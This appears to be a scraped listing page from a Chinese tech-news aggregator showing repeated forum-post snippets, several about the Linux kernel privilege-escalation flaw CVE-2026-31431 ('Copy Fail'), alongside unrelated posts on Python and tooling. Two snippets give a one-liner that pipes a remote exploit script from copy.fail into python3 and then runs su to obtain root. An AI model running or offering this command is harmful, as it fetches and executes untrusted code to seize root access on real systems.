Linux 提权漏洞,试了一下,还真的可以
curl https://copy.fail/exp | python3 && su 6 个帖子 - 5 位参与者 阅读完整话题
PY - 钛刻 - 科技风向旗 - 深度刻画技术趋势,引领数字未来 - 第2页 - 钛刻科技 | TCTI.cn - 钛刻 (TCTI.cn) 为您提供最前沿的硬核科技资讯、深度评测和未来技术趋势分析。
共 173 篇相关文章 · 第 2 / 9 页
curl https://copy.fail/exp | python3 && su 6 个帖子 - 5 位参与者 阅读完整话题
想起茴香的茴子有四种写法,孔乙己先生是高明的,他如果生在这个时代,就能用不同的思路让 AI 帮他解决问题了。 Python 列表去重的 20 种实现方式 列表(数组)去重是最常见的算法,非常简单,但不同实现方式背后的差异巨大。AI 时代,可以不手写代码了,但需要知道代码背后的原理
最近在做一个 PyInstaller 打包 + tkinter GUI 的项目,踩了不少坑,整理出来给佬们避雷。 背景 项目结构大致是:GUI 主程序负责界面和交互,动态执行一个打包进去的 Python 脚本, 脚本的 sys.stdout / sys.stderr 重定向到 G
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
各位晚上好: PY.KG距离开放以来已经快四个月了。目前注册人数和正在使用的域名不多也不少。因为目前PY.KG并不被广泛的认为是一个根域,PY.KG NIC也不是一个规范的注册局,出于对所有使用者的,当前域名使用有一堆限制,以至于该子域名并不如预期那样使用广泛。我相信这不仅困扰着
我看有佬开发那种手机控制去vibecoding 我也差不多吧,我说下我的方案 juicessh+tmux解决 termux体验感不太好,happy我听说过,不知道是什么,… 我看了看cc-web开源项目(站内) 感觉就是可视化的tmux,而且juicessh最舒服的就是可以看见每
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
CVE-2026-31431,也被称为“ Copy Fail ”,是一个影响广泛的 Linux内核本地权限提升漏洞 。它的CVSS评分高达 7.8 (高危),攻击者仅需利用一个逻辑缺陷,就可能在几毫秒内从普通用户提升至root权限,且利用过程稳定,无需任何复杂的条件。 该漏洞源于
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
做了个小工具叫 noni ,开源在 GitHub: https://github.com/williamwa/noni 解决什么问题 gh auth login 、 ssh-copy-id 、 npm publish 、 npm login 这些命令默认是交互式的,默认有一个 T
[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve
[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De